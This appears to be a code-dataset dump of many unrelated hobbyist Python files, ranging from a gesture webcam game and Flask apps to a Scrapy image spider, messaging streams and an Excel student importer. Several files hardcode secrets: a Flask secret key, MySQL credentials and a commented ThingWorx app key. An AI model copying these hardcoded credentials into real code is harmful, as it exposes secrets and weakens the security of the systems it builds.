animal_figures as af\nfrom pet_food import Pet_food\nfrom user import User\nimport helpers as hp\nimport prediction_model as pfm\n\n\nimport mediapipe as mp\nimport cv2\nimport numpy as np\nfrom menu_buttons import buttons\nimport helpers as hp\nfrom play_button import play\nglobal_time = time.time()\n# org = (20, 30)\nfontScale = 0.7\ncolor = (0, 255, 0)\nthickness = 2\nCHANGE_INTERVAL = 3\n\n\n# Media_pipe requirements\nmp_drawing = mp.solutions.drawing_utils\nmp_hands = mp.solutions.hands\n\ngame_status = 0\nexit_status = 0\nhelp_status = 0\ncap = cv2.VideoCapture(0)\n\n\nresponse, frame = cap.read()\n\n\n#call the class by giving dimensions and name of the buttons\nStart = buttons((frame.shape[0]//4, frame.shape[1]//2), 'Start')\nHelp = buttons((frame.shape[0]//4+80, frame.shape[1]//2), 'Help')\nExit = buttons((frame.shape[0]//4+160, frame.shape[1]//2), 'Exit')\n\n################################################################################\n# model = torch.load('../saved_models/best_acc_model4.pth', map_location='cpu')\nmodel = torch.load('../RESNET/2Resnet_gestures_epoch9.pth', map_location='cpu')\nFRAME_COUNTER = 50\npredictions_list = []\nstate = 'idle'\nplayer.status = 'wait'\n\n\n\n\nwhile True:\n success,frame=cap.read()\n frame=cv2.flip(frame,4)\n image=detector.findHands(frame)\n list=detector.findPosition(image,draw=False)\n if len(list)!=0:\n x=[ list[x][1] for x in range(len(list)) ]\n y=[ list[x][2] for x in range(len(list)) ]\n hc=int(np.average(x)+np.average(x)*0.02),int(np.average(y)+np.average(y)*0.031)\n img=af.draw_dog(list,image)\n img = cv2.circle(image, (0, 0), 20, (0, 255, 0), -1)\n img = cv2.circle(image, (0, image.shape[0]), 20, (0, 0, 255), -1)\n img = cv2.circle(image, (image.shape[1], 0), 20, (255, 0, 0), -1)\n img = cv2.circle(image, (image.shape[1], image.shape[0]), 20, (255, 255, 255), -1)\n\n if game_status == 0:\n #draw the buttons\n\n Start.draw_button(image)\n Help.draw_button(image)\n Exit.draw_button(image)\n\n #condition for index finger to touch play button\n if Start.position[1]-Start.axesLength[0]<=index_fing_x<=Start.position[1] + Start.axesLength[0] \\\n and Start.position[0]-Start.axesLength[1]<=index_fing_y<=Start.position[0] + Start.axesLength[1]:\n game_status = 1\n\n #condition for index finger to touch exit and Quit button\n if Exit.position[1]-Exit.axesLength[0]<=index_fing_x<=Exit.position[1] + Exit.axesLength[0] \\\n and Exit.position[0]-Exit.axesLength[1]<=index_fing_y<=Exit.position[0] + Exit.axesLength[1]:\n exit_status = 1\n\n #condition for index finger to touch exit button\n if Help.position[1]-Help.axesLength[0]<=index_fing_x<=Help.position[1] + Help.axesLength[0] \\\n and Help.position[0]-Help.axesLength[1]<=index_fing_y<=Help.position[0] + Help.axesLength[1]:\n help_status = 1\n\n if game_status == 1:\n image, game_status = play(vc, response, hc, image, index_fing_x, index_fing_y) #play the game\n elif exit_status == 1:\n exit()\n elif help_status == 1:\n print('I am helping you')\n\n\n\n cv2.imshow('Frame', frame)\n key = cv2.waitKey(1)\n if key == 27:\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"Projects/Build_week_3/GUI/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"497964030","text":"from flask import Flask, request, redirect, render_template, flash, url_for, json, make_response\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_bcrypt import Bcrypt\n\nfrom flask_googlemaps import GoogleMaps\nfrom models.user import User\nimport os\n\n# app and db dev environment settings:\n######################################\ndb_uri = 'mysql+pymysql://sleep-safe:sleep-safe@localhost:8889/sleep-safe'\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = db_uri\napp.config['SQLALCHEMY_ECHO'] = True\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'ZAj08N/$3m]XHjHy!rX R/~?X,9RW@UL'\n\nbcrypt = Bcrypt(app)\ndb = SQLAlchemy(app)\n\n# routes:\n# all routes get a decorator `@app.route` that takes at least one parameter - the url. \n# optional parameter: HTTP request types go here too. if left blank it defaults to a \"GET\" request\n####################################################################################################\n\n# Sleep Safe landing page - accessed at localhost:5000 for now\n@app.route(\"/\", methods=['GET'])\ndef index():\n ''' displays the Sleep Safe landing page '''\n return render_template('index.html')\n\n@app.route(\"/site\", methods=['GET'])\ndef location_detail():\n ''' displays the location detail page about the site selected by the user '''\n return render_template('location.html')\n\n# runs the app, always the last line\nif __name__ == '__main__':\n app.run(threaded = True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"467803937","text":"def bubble_sort(li):\n for i in range(len(li)-1):\n exchange = False\n for j in range(len(li)-i-1):\n if li[j] > li[j+1]:\n exchange = True\n li[j], li[j+1] = li[j+1], li[j]\n if not exchange:\n return li\n return li\n\nlist1 = [1,7,6,3,7,1,6,9]\nprint(bubble_sort(list1))","sub_path":"Algorithm_Basic/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"167688966","text":"from selenium import selenium\nimport unittest, time, re\n\nclass add_1st_event(unittest.TestCase):\n def setUp(self):\n self.verificationErrors = []\n self.selenium = selenium(\"localhost\", 4444, \"*chrome\", \"http://change-this-to-the-site-you-are-testing/\")\n self.selenium.start()\n \n def test_add_1st_event(self):\n sel = self.selenium\n sel.open(\"/tasks/\")\n sel.click(\"link=Add Events\")\n sel.wait_for_page_to_load(\"30000\")\n sel.type(\"id_name\", \"Event 1\")\n sel.type(\"id_location\", \"Event location\")\n sel.type(\"id_description\", \"event description\")\n sel.click(\"//input[@value='submit']\")\n sel.wait_for_page_to_load(\"30000\")\n \n def tearDown(self):\n self.selenium.stop()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"add_1st_event.py","file_name":"add_1st_event.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"81884438","text":"import time\nimport busio\nimport board\n\nclass ESPNEW:\n def __init__(self, baud=115200):\n self.s=busio.UART(board.TX, board.RX, baudrate=baud)\n time.sleep(0.1)\n self.reset()\n self.s.read(self.s.in_waiting)\n time.sleep(0.1)\n\n def buildJSON(self, func, data):\n toSend=b'${\"f\":\"'+func+b'\",\"d\":['\n for d in data:\n toSend =toSend+b'\"'+d +b'\",'\n toSend=toSend+b']}&'\n print(toSend)\n return toSend\n\n def storeapi(self,api, URL):\n toSend=b'dongle.storeAPISecret(\"'+api+b'\",\"'+ URL + b'\")\\r\\n'\n self.send(toSend)\n ret=self.clean_return()\n return(ret)\n\n def storewifi(self,ssid,password):\n toSend=b'dongle.storeWIFISecret(\"'+ssid+b'\",\"'+ password + b'\")\\r\\n'\n self.send(toSend)\n ret=self.clean_return()\n return(ret)\n\n \n def getTW(self):\n self.send()\n return(self.s.read())\n\n def putTW(self, thing, prop, value):\n toSend=b'dongle.PutTW(\"'+thing+b'\",\"'+ prop +b'\",\"'+ value +b'\")\\r\\n'\n self.send(toSend)\n ret=self.clean_return()\n return(ret)\n\n def setwifi(self):\n toSend=b'dongle.setWiFi()\\r\\n'\n self.send(toSend)\n ret=self.clean_return()\n return(ret)\n\n def setTW(self):\n toSend=b'dongle.setTW()\\r\\n'\n self.send(toSend)\n ret=self.clean_return()\n return(ret)\n\n def callTW(self):\n toSend=b'dongle.CallTW(\"Test1\",\"TestService\")\\r\\n'\n self.send(toSend)\n ret=self.clean_return()\n return(ret)\n\n def getMAC(self):\n toSend=b'dongle.getMAC()\\r\\n'\n self.send(toSend)\n ret=self.clean_return()\n return(ret)\n\n def reset(self):\n toSend=b'import dongle\\r\\n'\n self.send(toSend)\n return(self.s.read(self.s.in_waiting))\n\n def read(self):\n return(self.s.read())\n\n def send(self,body):\n while (len(body)>15):\n self.s.write(body[:15])\n body=body[15:]\n time.sleep(0.1)\n self.s.write(body) \n time.sleep(0.1)\n #ret=self.clean_return()\n #return(ret)\n\n\n def clean_return(self):\n \n while not (self.s.in_waiting) :\n pass\n time.sleep(0.1)\n ret=self.s.read()\n now= time.monotonic()\n start=time.monotonic()\n while ((now-start)<2 and not ('!!' in ret)):\n now= time.monotonic()\n if(self.s.in_waiting) :\n ret = ret + self.s.read()\n time.sleep(0.1)\n ret=str(ret)\n print(ret)\n ret = ret[ret.index(\"@\") + 6 : ret.index(\"!\") - 4]\n if (ret is None):\n return (0)\n else :\n return(ret)\n #if(self.s.in_waiting):\n # raw_ret=self.s.read()\n # print(raw_ret)\n #print(str(raw_ret).find(\">>>\"))\n #i=0\n # while str(raw_ret).find(\">>>\")<0:\n # if(i>15):\n # break\n # raw_ret+=self.s.read(400)\n # i=i+1\n # print(str(raw_ret)[str(raw_ret).find(\"\\r\\n\"):str(raw_ret).find(\"\\r\\n>>>\")])\n # return(str(raw_ret)[str(raw_ret).find(\"\\r\\n\"):str(raw_ret).find(\"\\r\\n>>>\")])\n # time.sleep(0.1)\n\n#Key = \"pp92f871d8-c3bd-4fd7-8fab-ee50e1fbd0e5\"\n#urlBase = \"https://-2008281301ci.portal.ptc.io:8443/Thingworx/\"","sub_path":"8266 Dongle/Xiao /wifi.py","file_name":"wifi.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"353922717","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport math\nimport pickle, gzip, numpy\nfrom PIL import Image\n\n\nwith gzip.open(\"test.pkl.gz\", \"rb\") as f:\n index_i = 0 # Index of MNIST image data\n train_set, valid_set, test_set = pickle.load(f, encoding=\"latin1\") # Extract images from pickle.\n one_mat = train_set[0][index_i] # Separate an image (directed by index_i) from whole images for training.\n size = int(math.sqrt(len(one_mat))) # Calc images size. (To assume images are foursquare)\n print(one_mat, len(one_mat), math.sqrt(len(one_mat)))\n splited_mat = [list(255 * one_mat[i : i + size]) for i in range(0, len(one_mat), size)] # Format the image. ([Pixel, Pixel, Pixel, ...] -> [[Pixel, Pixel, ...], [Pixel, Pixel, ...], ....])\n ttt = numpy.around(splited_mat) # Convert array elements into integer.\n img = Image.fromarray(ttt) # Show an image.\n img.show()\n f.close()\n","sub_path":"Lorder.py","file_name":"Lorder.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"412039647","text":"'''\nCreated on Jan 24, 2013\nDemonstrates a menu\nThis does not work on Mac\nI looked for solution on web but found none\n@author: rduvalwa2\n'''\nfrom tkinter import *\n\nclass Application(Frame):\n def __init__(self, master=None):\n Frame.__init__(self, master=None)\n self.configure(height=75, width=75)\n # create a menu bar\n menu = Menu(root)\n root.config(menu=menu)\n \n filemenu = Menu(menu)\n menu.add_cascade(label=\"File\", menu=filemenu)\n filemenu.add_command(label=\"New\", command=self.callback1)\n filemenu.add_command(label=\"Open...\", command=self.callback2)\n filemenu.add_separator()\n filemenu.add_command(label=\"Exit\", command=self.callback3)\n \n helpmenu = Menu(menu)\n menu.add_cascade(label=\"Help\", menu=helpmenu)\n helpmenu.add_command(label=\"About...\", command=self.callback4)\n\n self.pack()\n\n def callback1(self):\n print(\"You selected 'File | New'\")\n \n def callback2(self):\n print(\"You selected 'File | Open...'\")\n \n def callback3(self):\n print(\"You selected 'File | Exit'\")\n self.quit()\n \n def callback4(self):\n print(\"You selected 'Help | About...'\")\n\nroot = Tk()\napp = Application(master=root)\napp.mainloop()\n","sub_path":"PythonHomeWork/Py2/Py2_Lessons/src/menudemo.py","file_name":"menudemo.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"181400879","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport re\nfrom uumnt.items import UumntItem\n\nclass UumntspiderSpider(scrapy.Spider):\n name = \"uumntspider\"\n allowed_domains = [\"uumnt.com\"]\n start_urls = []\n \n start_urls.append('http://www.uumnt.com/meinv')\n for i in range(2,411):\n start_urls.append('http://www.uumnt.com/meinv/list_{}.html'.format(str(i)))\n\n def parse(self, response):\n atlas_list = response.xpath('//div[@id=\"mainbodypul\"]/div')\n print('此页有{}个图集'.format(len(atlas_list)))\n for list in atlas_list:\n atlas_name = list.xpath('./a/@title').extract()[0]\n atlas_url = 'https://www.uumnt.com' + list.xpath('./a/@href').extract()[0]\n print('图集{}地址为{}'.format(atlas_name,atlas_url))\n yield scrapy.Request(atlas_url, meta={'name':atlas_name}, callback = self.get_every_atlas_images)\n\n\n def get_every_atlas_images(self, response):\n print('进入图集.................................................')\n total = response.xpath('//div[@class=\"page\"]/a[last()]/@href').extract()[0]\n total_num = re.findall(r'(\\d+)\\.html$',total)[0]\n print('此图集共有{}张图片'.format(int(total_num)))\n for i in range(1,int(total_num)+1):\n subfix = re.findall(r'(\\d+).html$',response.url)[0] + '_' + str(i) + '.html'\n middle = re.findall(r'(\\w+)\\/\\d+\\.html$',response.url)[0]\n pic_url = 'https://www.uumnt.com/' + middle + '/' + subfix\n print('图片页面地址为{}'.format(pic_url))\n yield scrapy.Request(pic_url,meta={'name':response.meta['name']},callback=self.get_every_image)\n\n\n def get_every_image(self, response):\n print('下载图片..................................................')\n item = UumntItem()\n item['name'] = response.meta['name']\n image_urls = response.xpath('//div[@class=\"bg-white p15 center imgac clearfix\"]/a/img/@src').extract()\n for image_url in image_urls:\n item['image_url'] = image_url\n yield item\n","sub_path":"uumnt/uumnt/spiders/uumntspider.py","file_name":"uumntspider.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"275625743","text":"from tornado import gen\nfrom tornado.httpclient import HTTPRequest, HTTPError\nfrom tornado.httpclient import AsyncHTTPClient\n\nfrom .pipe import passed\nfrom .core import Stream\nfrom .topic import RedisStream\nfrom .namespace import NB\nfrom pymaybe import maybe\nimport json\n\n\n@Stream.register_api()\nclass to_kafka(Stream):\n \"\"\" Writes data in the stream to Kafka\n\n This stream accepts a string or bytes object. Call ``flush`` to ensure all\n messages are pushed. Responses from Kafka are pushed downstream.\n\n Parameters\n ----------\n topic : string\n The topic which to write\n producer_config : dict\n Settings to set up the stream, see\n https://docs.confluent.io/current/clients/confluent-kafka-python/#configuration\n https://github.com/edenhill/librdkafka/blob/master/CONFIGURATION.md\n Examples:\n bootstrap.servers: Connection string (host:port) to Kafka\n\n Examples\n --------\n >>> from streamz import Stream\n >>> ARGS = {'bootstrap.servers': 'localhost:9092'}\n >>> source = Stream()\n >>> kafka = source.map(lambda x: str(x)).to_kafka('test', ARGS)\n \n >>> for i in range(10):\n ... source.emit(i)\n >>> kafka.flush()\n \"\"\"\n\n def __init__(self, upstream, topic, producer_config, **kwargs):\n import confluent_kafka as ck\n\n self.topic = topic\n self.producer = ck.Producer(producer_config)\n\n Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)\n self.stopped = False\n self.polltime = 0.2\n self.loop.add_callback(self.poll)\n self.futures = []\n\n @gen.coroutine\n def poll(self):\n while not self.stopped:\n # executes callbacks for any delivered data, in this thread\n # if no messages were sent, nothing happens\n self.producer.poll(0)\n yield gen.sleep(self.polltime)\n\n def update(self, x, who=None):\n future = gen.Future()\n self.futures.append(future)\n\n @gen.coroutine\n def _():\n while True:\n try:\n # this runs asynchronously, in C-K's thread\n self.producer.produce(self.topic, x, callback=self.cb)\n return\n except BufferError:\n yield gen.sleep(self.polltime)\n except Exception as e:\n future.set_exception(e)\n return\n\n self.loop.add_callback(_)\n return future\n\n @gen.coroutine\n def cb(self, err, msg):\n future = self.futures.pop(0)\n if msg is not None and msg.value() is not None:\n future.set_result(None)\n yield self._emit(msg.value())\n else:\n future.set_exception(err or msg.error())\n\n def flush(self, timeout=-1):\n self.producer.flush(timeout)\n\n\n@Stream.register_api()\nclass to_redis(Stream):\n\n def __init__(self, topic, upstream=None, max_len=100, **kwargs):\n Stream.__init__(self, upstream=upstream, ensure_io_loop=True)\n self.rs = RedisStream(topic=topic, max_len=max_len)\n self >> self.rs\n\n\n# 自定义机器人的封装类\nclass Dtalk(Stream):\n \"\"\"钉钉群机器人.\"\"\"\n\n def __init__(self, webhook=None, secret=None, log=passed, max_retries=3, asynchronous=True, **kwargs):\n # todo 实现一个同步的dtalk\n self.log = log\n super(Dtalk, self).__init__(ensure_io_loop=True, **kwargs)\n\n self.client = AsyncHTTPClient()\n self.secret = secret\n self.webhook = webhook\n if not webhook:\n self.webhook = maybe(NB('dtalk'))['test']['webhook'].or_else(None)\n self.secret = maybe(NB('dtalk'))['test']['secret'].or_else(None)\n if not self.webhook:\n raise Exception(\"\"\"please input a webhook,or set a default webhook and secret to NB(\"dtalk\")[\"test\"] like this:\n NB('dtalk')['test']['webhook']='https://oapi.dingtalk.com/robot/send?access_token=xxx'\n NB('dtalk')['test']['secret']='SEC085714c31cxxxxxxx'\n \"\"\")\n\n # text类型\n\n def get_sign_url(self,):\n if self.secret:\n import time\n import hmac\n import hashlib\n import base64\n import urllib\n timestamp = int(round(time.time() * 1000))\n secret_enc = self.secret.encode('utf-8')\n string_to_sign = '{}\\n{}'.format(timestamp, self.secret)\n string_to_sign_enc = string_to_sign.encode('utf-8')\n hmac_code = hmac.new(secret_enc, string_to_sign_enc,\n digestmod=hashlib.sha256).digest()\n sign = urllib.parse.quote_plus(base64.b64encode(hmac_code))\n url = self.webhook+f'×tamp={timestamp}&sign={sign}'\n else:\n url = self.webhook\n\n return url\n\n @gen.coroutine\n def emit(self, msg: str, asynchronous=False) -> dict:\n yield self.post(msg, self.log)\n\n @gen.coroutine\n def post(self, msg: str, log: Stream) -> dict:\n # 二进制或者set类型的,转成json格式前需要先转类型\n if isinstance(msg, bytes) or isinstance(msg, set):\n msg = str(msg)\n data = {\"msgtype\": \"text\", \"text\": {\"content\": msg},\n \"at\": {\"atMobiles\": [], \"isAtAll\": False}}\n if isinstance(msg, str) and '@all' in msg:\n data = {\"msgtype\": \"text\", \"text\": {\"content\": msg},\n \"at\": {\"atMobiles\": [], \"isAtAll\": True}}\n elif isinstance(msg, str) and msg.startswith('@md@'):\n # @md@财联社新闻汇总|text\n content = msg[4:]\n title, text = content[:content.index(\n '|')], content[content.index('|')+1:]\n data = {\n \"msgtype\": \"markdown\",\n \"markdown\": {\"title\": title, \"text\": text}\n }\n\n post_data = json.JSONEncoder().encode(data)\n\n headers = {'Content-Type': 'application/json'}\n\n url = self.get_sign_url()\n\n request = HTTPRequest(\n url,\n body=post_data,\n method=\"POST\",\n headers=headers,\n validate_cert=False)\n # validate_cert=False 服务器ssl问题解决\n try:\n # response = yield self.retry_client.fetch(request)\n response = yield self.client.fetch(request)\n result = json.loads(response.body.decode('utf-8'))\n except HTTPError as e:\n result = f\"send dtalk eror,msg:{data},{e}\"\n\n return {'class': 'Dtalk',\n 'msg': msg,\n 'webhook': self.webhook,\n 'result': result,\n } >> log\n\n def send(self, msg):\n from .core import sync\n return sync(self.loop, self.emit, msg)\n\n\nif __name__ == '__main__':\n 123 >> Dtalk()\n","sub_path":"build/lib/deva/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":6871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"618821432","text":"\nimport getopt\nimport sys\n\ndef Usage():\n print(\"{0} [-h|--help] [-l xxx|--list=xxx] [-d xx|--demo=xx] [-c xxx|--config=xxx] [-m xx|--module=xx]\".format(sys.argv[0]))\n\ntry:\n options,args=getopt.getopt(sys.argv[1:],\"hl:d:c:m:\",[\"help\",\"list=\",\"demo=\",\"config=\",\"module=\"])\nexcept getopt.GetoptError as e:\n print(\"error\",e)\n Usage()\n sys.exit(0)\n\nfor name,values in options:\n if name in (\"-h\",\"--help\"):\n Usage()\n if name in (\"-l\",\"--list\"):\n print(\"-l|--list value for {}\".format(values))\n print(\"######end list######\")\n if name in (\"-d\",\"--demo\"):\n print(\"-d|--demo value for {}\".format(values))\n print(\"#######end demo#######\")\n if name in (\"-c\",\"--config\"):\n print(\"-c|--config value for {}\".format(values))\n print(\"#######end config##########\")\n if name in (\"-m\",\"--module\"):\n print(\"-m|--module value for {}\".format(values))\n print(\"########end module###########\")\n\nprint(\"args for {}\".format(args))\n\n\"\"\"\n-m|--machine stand for short(abbreviation)/long(full name) selectable parameter\naction: store/store_true/store_false how to deal with variable\ndest: variable name,default for full parameter name\ntype: string/int parameter store type \n\"\"\"\nfrom optparse import OptionParser\nparser = OptionParser(usage=\"%prog [options]\")\nparser.add_option(\"-m\", \"--machine\", action=\"store\", type=\"string\", dest=\"machine\", help=\"the machine to be check\")\n(options, args) = parser.parse_args()\nif options.machine:\n print(options.machine)\n\nfrom optparse import OptionParser\n\nparser = OptionParser(usage=\"usage:%prog [optinos] filepath\")\nparser.add_option(\"-t\", \"--timeout\",\n action=\"store\",\n type='int',\n dest=\"timeout\",\n default=None,\n help=\"Specify annalysis execution time limit\"\n )\nparser.add_option(\"-u\", \"--url\",\n action=\"store_true\",\n dest=\"url\",\n default=False,\n help=\"Specify if the target is an URL\"\n )\n(options, args) = parser.parse_args()\n\nif options.url:\n print(args[0])\nprint(options.timeout)\n","sub_path":"Python_Demo/getopt_parser.py","file_name":"getopt_parser.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"542844096","text":"#encoding: utf-8\n#autor: Allan Sánchez Iparrazar\n#Combinador de colores\n\ndef buscarEmpate(colorA,colorB):\n if colorB == \"rojo\" and colorA == \"rojo\" : \n error = 1\n elif colorB == \"azul\" and colorA == \"azul\":\n error = 1\n \n elif colorB == \"amarillo\" and colorA == \"amarillo\":\n error = 1\n \n else : \n error = 0\n \n return error\n \ndef buscarError (color):\n if color == \"azul\" or color == \"rojo\" or color == \"amarillo\" :\n error = 1\n else :\n error = 0\n \n return error\n \n \ndef combinarColores(colorA,colorB):\n if colorA == \"azul\" and colorB == \"amarillo\" :\n color = \"VERDE\" \n elif colorA == \"amarillo\" and colorB == \"azul\" :\n color = \"VERDE\"\n \n \n elif colorA == \"rojo\" and colorB == \"azul\" :\n color = \"MORADO\"\n elif colorA == \"azul\" and colorB==\"rojo\" :\n color = \"MORADO\"\n \n elif colorA == \"rojo\" and colorB == \"amarillo\" :\n color = \"NARANJA\"\n elif colorA == \"amarillo\" and colorB == \"rojo\" :\n color = \"NARANJA\"\n \n return color\n\n\n\ndef main ():\n color1 = input(\"Ingresa un color; azul, amarillo o rojo\")\n colorA = color1.lower()\n \n color2 = input(\"Ingresa otro color; azul, amarillo o rojo\")\n colorB = color2.lower()\n#--------------------------------------------------------------------\n\n \n empate = buscarEmpate(colorA,colorB)\n \n if empate == 0 : \n error = buscarError (colorA and colorB)\n \n if error == 1: \n combinacion = combinarColores (colorA,colorB)\n print(\"La combinación de los colores da \",combinacion)\n \n \n \n \n \n else : \n print(\"Ingresa un color válido\")\n else : \n print(\"Ingresaste el mismo color\")\n \n \n \n \n \n\n\nmain()","sub_path":"colores.py","file_name":"colores.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"586216848","text":"from turtle import *\nimport turtle\n\nturtle.hideturtle()\n# turtle.bgcolor('black')\nturtle.color('black')\nturtle.speed(0)\nturtle.delay(0)\n\nturtle.pensize(0.2)\nturtle.setup (width=1200, height=1000, startx=0, starty=0)\nturtle.pu()\nturtle.goto(-480, -100)\nturtle.pd()\nls = [60, -120, 60, 0]\ndef koch_curve(size, recursive_steps, ls):\n\tif recursive_steps > 0:\n\t\tfor i in range(len(ls)):\n\t\t\tkoch_curve(size, recursive_steps-1, [i for i in ls])\n\t\t\tturtle.left(ls[i])\n\n\telse:\n\t\tturtle.forward(size)\n\nkoch_curve(1.3, 6, ls)\nturtle_screen = turtle.getscreen()\nturtle_screen.getcanvas().postscript(file=\"koch_snowflake6.eps\", colormode = 'color')\nturtle.exitonclick()\n\n# 50, 2","sub_path":"koch_snowflake.py","file_name":"koch_snowflake.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"534149797","text":"from flask import Flask, redirect, url_for, request, render_template, jsonify, current_app\nfrom flask_admin import Admin, AdminIndexView, expose, BaseView, expose\nfrom flask_admin.base import MenuLink\nfrom libs.model_view import ModelView\nfrom db import db\nfrom flask_babelex import Babel\nfrom werkzeug.utils import secure_filename\nimport os\nimport xlrd\nfrom models.curso import Curso\nfrom models.colegio import Colegio\nfrom models.asignatura import Asignatura\nfrom models.profesor import Profesor\nfrom models.alumno import Alumno\nfrom models.apoderado import Apoderado\nfrom models.evaluacion import Evaluacion\nfrom models.administrador import Administrador\nfrom models.direccion import Direccion\nfrom models.region import Region\nfrom models.ciudad import Ciudad \nfrom models.comuna import Comuna\nfrom models.topico import Topico\nfrom models.prueba import Prueba\nfrom models.alerta import Alerta\nfrom models.observacion import Observacion,ObservacionProfesor\nfrom models.asistencia import Asistencia\nfrom models.justificacion import Justificacion\nfrom models.anotacion import Anotacion\nfrom models.evento import Evento\nfrom models.archivo import Archivo\nfrom models.video import Video\n\ndef create_app(config=\"config.cfg\"):\n app = Flask(__name__)\n app.config.from_pyfile(config)\n babel = Babel(app)\n db.init_app(app)\n admin = Admin(app, name='PreuApp', template_mode='bootstrap3')\n @babel.localeselector\n def get_locale():\n return \"es\"\n\n return app, admin\n\napp, admin = create_app()\n\nclass ViewWithMethodViews(BaseView):\n @expose('/', methods=[\"POST\", \"GET\"])\n def index(self):\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n return \"

Debe enviar un archivo

\"\n file = request.files['file']\n if file.filename == '':\n return \"

Debe enviar un archivo

\"\n if not \".xls\" in file.filename:\n return \"

El archivo debe ser un excel

\"\n if file:\n filename = secure_filename(file.filename)\n filename = filename\n filepath = os.path.join(\"/tmp\", filename)\n file.save(filepath)\n url_path = url_for('.process_file', filename=filename)\n return \"

Procesar excel


otra funcion con la misma xls\" % (url_path, \"falso\")\n \n return \"\"\"Subir Excel\n

Selecciona el archivo

\n
\n \n \n
\"\"\"\n \n #Referencias filas excel\n # a b c d e f g h i j k l m n o p q r s t u v w x y z aa ab ac ad ae af ag\n # 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 \n @expose('/import/process/')\n def process_file(self, filename):\n from xlrd import open_workbook, xldate_as_tuple\n filas = 0\n filepath = os.path.join('/tmp', filename)\n wb = open_workbook(filepath)\n sheet = wb.sheets()[0]\n filas_importadas = 0\n for row in range(1, sheet.nrows):\n rut = str(sheet.cell(row, 0).value)\n if Alumno.objects(rut=rut).first() == None:\n nombres = str(sheet.cell(row, 1).value)\n apel_pa = str(sheet.cell(row, 2).value)\n apel_ma = str(sheet.cell(row, 3).value)\n sexo = str(sheet.cell(row, 4).value)\n email = str(sheet.cell(row, 5).value)\n telefono = str(sheet.cell(row, 6).value)\n calle = str(sheet.cell(row, 7).value)\n numero = str(sheet.cell(row, 8).value)\n comuna = str(sheet.cell(row, 9).value)\n curso = str(sheet.cell(row, 10).value)\n colegio = str(sheet.cell(row, 11).value)\n colegio_calle = str(sheet.cell(row, 12).value)\n colegio_numero = str(sheet.cell(row, 13).value)\n colegio_comuna = str(sheet.cell(row, 14).value)\n alumno = Alumno()\n alumno.rut = rut\n alumno.encrypt_password(rut)\n alumno.nombres = nombres\n alumno.apellido_paterno = apel_pa\n alumno.apellido_materno = apel_ma\n if sexo == 'M':\n alumno.sexo = 'MASCULINO'\n if sexo == 'F':\n alumno.sexo = 'FEMENINO'\n if curso == 'C':\n ciencias = Curso.objects(nombre=\"Ciencias 2019\").first()\n if ciencias != None:\n alumno.curso = ciencias.id\n if curso == 'H':\n historia = Curso.objects(nombre=\"Historia 2019\").first()\n if historia != None:\n alumno.curso = historia.id\n alumno.email = email\n alumno.telefono = telefono\n direccion = Direccion()\n direccion.calle = calle\n direccion.numero = numero\n direccion.comuna = comuna\n alumno.direccion = direccion\n colegio_alumno = Colegio.objects(nombre = colegio).first()\n if colegio_alumno != None:\n alumno.colegio = colegio_alumno.id\n else:\n colegio_alumno = Colegio()\n colegio_alumno.nombre = colegio\n direccion = Direccion()\n direccion.calle = colegio_calle\n direccion.numero = colegio_numero\n direccion.comuna = colegio_comuna\n colegio_alumno.direccion = direccion\n colegio_alumno.save()\n alumno.colegio = colegio_alumno.id\n alumno.imagen = \"default\"\n alumno.puntaje_ingreso = 500\n alumno.save()\n filas_importadas += 1\n for colegio in Colegio.objects().all():\n colegio.updateCantEstudiantes()\n for curso in Curso.objects().all():\n curso.updateCantEstudiantes()\n return \"%d Fila importadas\" % filas_importadas\n\n\ndef add_views(admin):\n \n admin.add_view(ModelView(Curso, \"Cursos\", category=\"Curso\"))\n admin.add_view(ModelView(Asignatura, \"Asignaturas\", category=\"Curso\"))\n admin.add_view(ModelView(Administrador, \"Administradores de Institucion\", category=\"Perfiles\"))\n admin.add_view(ModelView(Profesor, \"Profesores\", category=\"Perfiles\"))\n admin.add_view(ModelView(Alumno, \"Alumnos\", category=\"Perfiles\"))\n admin.add_view(ModelView(Apoderado, \"Apoderados\", category=\"Perfiles\"))\n admin.add_view(ModelView(Evaluacion, 